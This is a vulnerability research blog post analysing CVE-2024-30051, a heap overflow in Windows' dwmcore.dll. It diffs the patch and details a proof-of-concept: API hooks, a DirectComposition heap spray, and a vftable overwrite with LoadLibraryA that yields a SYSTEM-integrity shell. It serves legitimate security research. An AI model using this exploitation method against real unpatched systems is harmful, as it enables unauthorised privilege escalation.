Windows DWM Core Library Elevation of Privilege Vulnerability (CVE-2024-30051)
In this blog post, I will explain a vulnerability in the Microsoft Windows Desktop Windows Manager (DWM) Core library that I analyzed when the exploit for Core Impact was being developed. This vulnerability allows an unprivileged attacker to execute code as a DWM user with Integrity System privileges (CVE-2024-30051).
Since there was not enough public information at the time to develop the exploit, I had to do a significant amount of reversing. In this blog, I will demonstrate how to reverse the KB5037771 patch for Windows 23H2 using IDA PRO. Using BINDIFF to perform binary diffing between dwmcore.dll version 10.0.22621.3447 and version 10.0.22621.3593, I will show how the heap overflow is produced. From there, I'll illustrate how to exploit it by elevating privileges and will end with creating a functional PoC.
Vulnerability Details
Windows DWM Core Library Elevation of Privilege Vulnerability CVE-2024-30051
Released: May 14, 2024
Assigning: Microsoft CVE-2024-30051
Impact: Elevation of Privilege
Max Severity: Important
Weakness:
CWE-122: Heap-based Buffer Overflow
CVSS: 3.1 7.8 / 7.2
This vulnerability exists due to a size miscalculation error in an integer division within the main Windows DWM library called dwmcore.dll. A local user can cause a buffer overflow on the heap in the CCommandBuffer::Initialize method in dwmcore.dll and can execute arbitrary code with the DWM user with Integrity System Privileges. The exploit will perform a Heap Spray in the DWM process to prepare the memory and finally produces a Heap Overflow in dwmcore.dll which will be triggered by releasing certain parts of the heap spray.
Once the exploit is successful, the DWM process will load our crafted DLL that executes our code or our executable (in our case a CMD) as the DWM user which has Integrity System Privileges.
Let’s walk through this vulnerability and see how it allows us to run as a DWM user with Integrity Level SYSTEM. Note that since this is not a user belonging to the Administrator group it has some privilege restrictions.
Diffing to Find the Bug
The patch for Windows 11 23H2 can be downloaded from:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB5037771
windows11.0-kb5037771-x64_19a3f100fb8437d059d7ee2b879fe8e48a1bae42.msu
The vulnerable version of dwmcore.dll is: 10.0.22621.3447
The patched version of dwmcore.dll is: 10.0.22621.3593
Analyzing the changed functions, it’s clear the patched version of CCommandBuffer::Initialize has a lot of blocks added, making it look quite different to the unpatched version.
After statically reversing that function, there are two calls to CD2DSharedBuffer::GetBufferSize.
The first call gets the size to allocate in the new and the second call gets the same size for the memcpy.
Everything initially seems correct. However, before the allocation, it performs some operations with the size.
It gets buffer_size and buffer_size2 by calling the same CD2DSharedBuffer::GetBufferSize function, returning both the same value. But in the new it performs a pre-operation, an integer division of the buffer_size by 0x90 and then multiplying by 0x90, whereas in the memcpy it uses the returned buffer_size2 without operating on it.
With these operations, I found that the size finally used in the new and in the memcpy can be different.
buffer_size = buffer_size2 (sizes returned)
size_new= buffer_size/0x90 x 0x90
size_memcpy=buffer_size2
For example, if buffer_size is 0x91:
buffer_size = buffer_size2=0x91
size_new= buffer_size/0x90 x 0x90 =0x90
size_memcpy= buffer_size2= 0x91
This example proves that there is a heap overflow. It’s copying more bytes than allocated, and the size is controllable.
For example, if buffer_size is 0x23f as they used in the POC.
buffer_size = buffer_size2=0x23F
size_new= buffer_size/0x90 x 0x90 =0x1b0
size_memcpy== buffer_size2=0x23f
With the vulnerable function analyzed, I wanted to see how to reach the vulnerable function CCommandBuffer::Initialize. This is where things start to get complicated.
Looking back at the references to this function, it seems to be reached from methods of the CPrimitiveGroup class:
It has its constructor:
And it is reached this way:
As I went through this process initially, I took the time to read The Lost World of DirectComposition: Hunting Windows Desktop Window Manager Bugs to dive into the world of Direct Composition. This helped me to create my first PoC.
Also, I needed to reverse win32ksys and tried to send packages through the functions:
- NtDCompositionCreateChannel
- NtDCompositionProcessChannelBatchBuffer
- NtDCompositionCommitChannel
My first PoC reached the CPrimitiveGroup constructor. However, after a lot of reversing I did not find a way to handle the calls to the vftable methods to get to the vulnerable function directly through ALPC calls using these functions.
I spent a lot of time doing some complicated reversing. During this process, I found the sample of the malware that exploited the vulnerability, which was immensely helpful because the exploitation method is much more complex than I initially thought. It also includes several hookings to system APIs and uses methods that are perhaps a little questionable. But anything is valid in war and exploits, so I began to analyze the malware and from that analysis I created my final PoC that finally exploits the vulnerability, which I will explain below.
First, I want to clarify that the malware not only exploits the CVE-2024-30051 vulnerability that elevates our process to Integrity System Level, but it also performs a second part which from there ends up elevating a SYSTEM user with all privileges, which already exceeds the CVE explained.
Additionally, it’s important to note that the malware is much more complex than my PoC that tries to minimize the code. The malware performs many more checks to ensure reliability and because of that it works on the first try. I discarded all those checks to simplify and dedicated myself to pure exploitation, even perhaps having to run the PoC two or three times to achieve the exploitation.
Analysis of the PoC exploiting CVE-2024-30051
1)Initialization
The link to the executable PoC is https://github.com/fortra/CVE-2024-30051
The PoC calls to GetVersion to get the OS version where it is running and according to that it performs different initializations of some global variables. My PoC was tested on Windows 11 23H2 and Windows 11 22h2. Other systems are vulnerable, too, and I added the values to exploit them.
2)Hooking
It hooks four system functions and without hooking them it cannot achieve the exploitation. These systems are: RtlAllocateHeap, RtlCreateHeap, NtDCompositionCreateChannel and NtDCompositionCommitChannel.
In these functions it will patch the first 5 bytes to make it jump to its own code. Of course, the code cannot be very far away since a 5-byte jump does not cover all the memory and must be near.
To make it, the malware uses a very long code, analyzing the memory map to decide where it can perform the allocation of its own code. As the code is complicated, I focused on making it two simple lines:
- base_ntdll = GetModuleHandleW(L"ntdll.dll");
- global4_ = (char *)VirtualAlloc((LPVOID)(base_ntdll-0x2000), 0x1000uLL, 0x3000u, 0x40u);
I subtracted from the ntdll base, 0x2000 and I passed that address to VirtualAlloc to allocate there.
The 64-bit DLL are mapped quite separately in the memory from each other with empty spaces between them.
Let's see how the hooks work:
It calls a hooking function, which is the one that will perform the hooking of the RtlAllocateHeap API, which has three arguments, the first is the address of the API to be patched, called sym_RtlAllocateHeap.
Before patching, it points to the start of the API:
Here is the RtlAllocateHeap function:
The second argument is the routine called hook that will be executed when the API is completely patched:
The hook function calls my_RtlAllocateHeap.
The hooking function will patch the first 5 bytes of the API so that it jumps to hook.
It will call the code in the allocated area where it will execute the first API instruction that was stepped with the 5 bytes and then jump to RtlAllocateHeap+5 right after the patched bytes:
This is how the API will look after the hook. The first 5 bytes changed so that it jumps to hook. It will call my_RtlAllocateHeap the code that is just above which will return to the area marked in purple to continue the execution of the API:
When the API finishes executing it will return to hook. From there it will compare the global variable heap_base (which is initially zero) with the first argument passed to RtlAllocateHeap:
After that the code waits for a certain special allocation, which has a specific HeapHandle. At the beginning this variable is zero and as long as it is zero it will skip and work like a normal RtlAllocateheap:
The parameter HeapHandle is obtained inside RtlCreateHeap which coincidentally is the second hooked API.
Looking for references to the global variable heap_base, it only changes its value in the hook2 function, which is the one that is executed after hooking RtlCreateHeap:
So, the idea is to capture a certain HeapHandle and save it in heap_base. Since it is now different from zero, the function hook will start to compare each allocation. So, the PoC will save the address memory who has the same HeapHandle as the previously stored.
When this is the case, it will save the direction of the allocation to the variable named base:
These first two hooks are now chained. When hook2 saves the expected value of HeapHandle, it activates the hook function that will save the allocation address which uses the same HeapHandle.
The third hook is submitted to NtDCompositionCreateChannel. The first time it is called it will save the MappedAddress, which is the content of the third argument. From there it will change hooked_flag to 1 so from then on it will not save anymore and will work normally.
The address saved in variable base will be read later three times. Two of them will occur in the last hook, called hook4:
The function hook4 to NtDCompositionCommitChannel will be analyzed later on because it's quite complex and very important.
3)Creating the Window
After the four hooks are completed, it returns to the main function to start creating a window. This is done by calling RegisterClassExW. However, to register a window class for later use, it should be called with CreateWindowExW function.
This initializes the COM library by calling CoInitializeEx to be used by the calling thread:
It calculates the required size of the window rectangle, based on the desired size:
The function CreateWindowExW is called to create a window that will be drawn:
4)Create Device
From there, call D3D11CreateDevice to create a device or DirectX device that represents the display adapter:
In my PoC, ppDevice is named d3dDevice and ppInmediateContext is named d3dContext:
The argument flags need to be set to 0x20:
Then call AddRef:
This increments the reference counter for an interface pointer to a COM object:
The value 0x10 is subtracted to THIS:
In the offset 0xf8 from ID3D11Device-0x10 there is a pointer to TComObject:
This will be the new THIS and ends up jumping to TComObject::AddRef:
And it ends by adding one to the object counter that's in TComObject's offset 8:
Then, AddRef will increase the counter of the other object type created in D3D11CreateDevice, which is type ID3D11DeviceContext:
In this case, to find the new THIS, it subtracts 0x108:
It jumps here where in offset 0x98 is the new THIS:
This is the counter. In this example, it's a QWORD:
5) Create Factory
The PoC calls D2D1CreateFactory to use Direct2D, and to create the ID2D1Factory interface that is used to create other Direct2D resources that can be used to draw or describe shapes:
The riid argument is the one suggested by the Microsoft page:
These are the malware uses:
The right one for ID2D1Factory can be found here:
https://github.com/apitrace/dxsdk/blob/master/Include/d2d1_1.h
Since I am not an expert in Direct Composition, I then used the same steps as the malware.
The new factory that returns does not provide any detailed type. It says void *, which means it is not officially documented:
As I don't know an object type like in this case, I developed an executable that uses it to see it in memory easily:
Add breakpoints in the four hook functions. In this case, a breakpoint in hook2 will show when it captures the HeapHandle:
The hook should also be stopped when the desired chunk is captured:
Put breakpoints in the other two hooks:
Then it continues calling QueryInterface:
https://help.solidworks.com/2020/english/api/sldworksapi/queryinterface_example_cplusplus_com.htm
https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/shared/dxgi.idl
It tries to perform a kind of dynamic casting. If the object of type ID3D11Device can accept the interface (use the methods, etc.) of IDXGIDevice, it creates a copy of the original object that accepts new type, after that returns the pointer to it. In this case the variable d3dContext1 will be type IDXGIDevice:
Both objects inherit from CLayeredObject<Cdevice>
The original ID3D11Device is:
Like the one which returns the pointer.
Then it creates an ID2D1Device object with the function CreateDevice:
In value2 it returns an object of type ID2D1Device.
6) Create a Device Context
At this point, the PoC creates a new device context from a Direct2d device. Using the function CreateDeviceContext:
Here it is implemented in the PoC:
7) Create a Composition Device
Then call DCompositionCreateDevice:
The IID belongs to _IDCompositionDevice:
8) Calling DCompositionCreateDevice Function
At the same moment that the function is traced over DCompositionCreateDevice, it stops at hook3, when it calls NtDCompositionCreateChannel:
This way it's capturing the MappedAddress that the system uses internally when DCompositionCreateDevice was called:
This is the Call stack up to here:
This is the point where the dcomp module calls to function NtDCompositionCreateChannel:
9) Creating A Target for Handle HWND
After returning from previous step, save the MappedAddress. Using ALPC, it will connect to the DWM process and then call CreateTargetForHwnd:
It uses the handle HWND of the created window. It is related to the device that I just created, which is the THIS of this method:
10) Creating Surface
Next, call CreateSurface:
11) Calling BeginDraw, EndDraw, and CreateVisual
From there, call BeginDraw, EndDraw, and arrive at CreateVisual.
First, call BeginDraw. This uses the IID _IDXGISurface:
Then, call EndDraw.
12) Calling Visual SetContent
Next, it calls IDCompositionVisual::SetContent:
And it calls SetRoot:
The updateObject that is received in BeginDraw does not specify what type it is in the documentation.
13) Release Objects
Next, it releases the previous created objects:
14)Commit Composition Device
And now using the same dcompDevice object of type IDCompositionDevice, it calls to the Commit method:
15)Calling hook2
Calling that Commit method stops on hook2 that captures the desired HeapHandle:
This is the call stack now:
Remember that the vulnerable function can be reached using some methods of the CPrimitiveGroup class. At this point it creates a Heap, then hook2 captures and saves the corresponding HeapHandle.
16) Calling the Function Hook
Before returning to the main, it also creates a chunk using RtlAllocateHeap. It is then caught and stored in the base variable inside the hook function:
The calls to Create and Allocate are performed one after the other:
Both (Allocate and Create) are called from DirectComposition::Cdevice::Commit:
17) Calling the Function hook4
After that, when NtDCompositionCommitChannel is called, it stops at hook4:
NtDCompositionCommitChannel is called from here:
It is also called from DirectComposition::Cdevice::Commit:
It is worth mentioning that the system has already batched the commands to send by ALPC to DWM. After that it sends commands using NtDCompositionCommitChannel.
The function hook4 intercepts the NtDCompositionCommitChannel calls and at this point more commands will be added to the batch.
Let's see what hook4 does.
A loop is performed through the chunk pointed for base.
It exits the loop when finds the value 0x120 inside the chunk:
It stores the address and the offset where 0x120 value was located:
It overwrites the 0x120 value with value4, which is equal to 0x1b0 + 0x8f = 0x23f. This is the size that it will use in memcpy when it overflows:
It adds 0xbc + 0x90 to the address pointer where the 0x120 was located:
Remember that at offset 0x48 from base was 0x120 size. That was overwritten by 0x23f, therefore the original chunk must be size 0x120:
The source is the pointer address of 0x23f + 0x2c:
It initially added 0x90 but then subtracts 0x90 again.
The destination is the address of the pointer to 0x120 + 0xbc:
It will write on this:
All the writings are then inside the chunk:
It then repeats the loop 3 times, which is the result of the entire division of 0x1b0/0x90:
After that, as the ArgChannelHandle channel is the same one that was used when the MappedAddress was captured. The PoC will add commands to the batch using NtDCompositionProcessChannelBatchBuffer. These will be processed along with those that the system had added. The batch collects them and then the commands are sent all together using NtDCompositionCommitChannel:
The command sent has the value 8, which corresponds to SetResourceIntegerProperty for 4 different trackers (1,2,3, and 4).
18) Performing Heap Spray
When the PoC returns to the main function, it creates a different channel to perform the HeapSpray.
It batches 0x10000 commands, which are sent with _NtDCompositionCommitChannel:
This uses the value CreateResource=1 and the type that corresponds to CHolographicInteropTextureMarshaler = 0x50:
The allocations are performed in the code below. The size of the objects created to make the spray is 0x1b0:
It then performs a loop to release the objects created in the previous step and now makes holes in memory distribution.
The variable counter2 begins at 0x3000 and adds steps of 0x20 while it is less than 0x7000:
19) Modifying the Base Chunk Before Send
It writes 0x41s from the direction of the chunk that was in base + 0x48 + 44 + 0x1b0.
That is, it is writing values that will be used later—when it overflows the adjacent chunk:
That pvalue7 is located on the address 0x224 from the base:
Then it goes to the function “escribe”:
It writes the pKernelCallbacktable plus 0x388, the LoadLibraryA address and the path to the DLL that will load. In this case, I named it s11.dll.
20) Debugging the DWM Process
Now, a kernel debugger is needed to stop at the vulnerable function when the heap overflow occurs. This is because the DWM process cannot be debugged with a user mode debugger.
Using IDA PRO to remotely debug the target, set a conditional breakpoint so it stops when the size is equal to 0x1b0:
print ("VALUE1 %x" % ((cpu.rax)))
return cpu.rax==0x1b0.
Since a user mode program is being debugged from kernel, a switch needs to be made to the DWM process context to put the breakpoint. Reload the user symbols with:
. reload /user
Reload the kernel ones with:
. reload /f
It will stop when ShowWindow is stepped over:
It allocates with size 0x1b0 and copies with size 0x23f, producing the heap overflow:
At this point the call stack looks like this:
To create the overflow, the DWM receive values in the code below.
The crafted values in base sent from my PoC are read using MapViewofFile from the DWM process in the module dwmcore.dll:
The previous function is called from:
When it is sent using ALPC from hook4 using destination_copy (NtDCompositionCommitChannel) it stops:
Remember that in hook4 commands, commands were added to the batch. However, the system also had already added some commands to the batch, including the base and the crafted data:
In this case it shares a memory area that starts at 000001cd'178d0000. When it is used it as a source to perform the memcpy it will be 0x794 bytes later in that same memory area.
The size of the shared memory area is 0x4000:
It will stop when the size to be allocated is 0x1b0, and reaches the memcpy to copy 0x23f bytes:
Beyond 0x1b0 in the memory is the code that will overflow overwriting the adjacent block:
When the chunks are released from the PoC, it ends by jumping to LoadLibraryA , which loads the crafted library:
That comes from here:
The Heap spray was made with 0x1b0 size objects of type CHolographicInteropTexture.
Since I had made holes in the memory distribution, this releases some objects. As the block that is going to overflow has as size 0x1b0 too, it has a high probability of being located in the holes in the heap spray.
At the destination of the memcpy the blocks are located every 0x1b0 bytes:
The pointer to a vftable is overwritten by the pointer to LoadLibrary.
Before overwriting:
After overwriting:
Remember that it ended jumping to [R11+50], which is the pointer to LoadLibraryA.
21) Elevating Privileges to Integrity System Level
Executing the PoC, copy the DLL in the same path that figures in the PoC:
After executing the PoC a CMD process is executed with DWM user Integrity System Level privileges:
References:
PoC at Fortra GitHub: https://github.com/fortra/CVE-2024-30051
Official CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30051
Vulnerability Advisory: https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30051
This completes the PoC. Remember that if you execute it many times the heap will remain in an unstable state, so you may need to restart the machine to make it work again. Also, while it may not always work in the first shot, it will typically work correctly during a second or third attempt. As you can see, reversing can be difficult, so if you have any questions, you can consult me.
Email: [email protected]
X: @ricnar456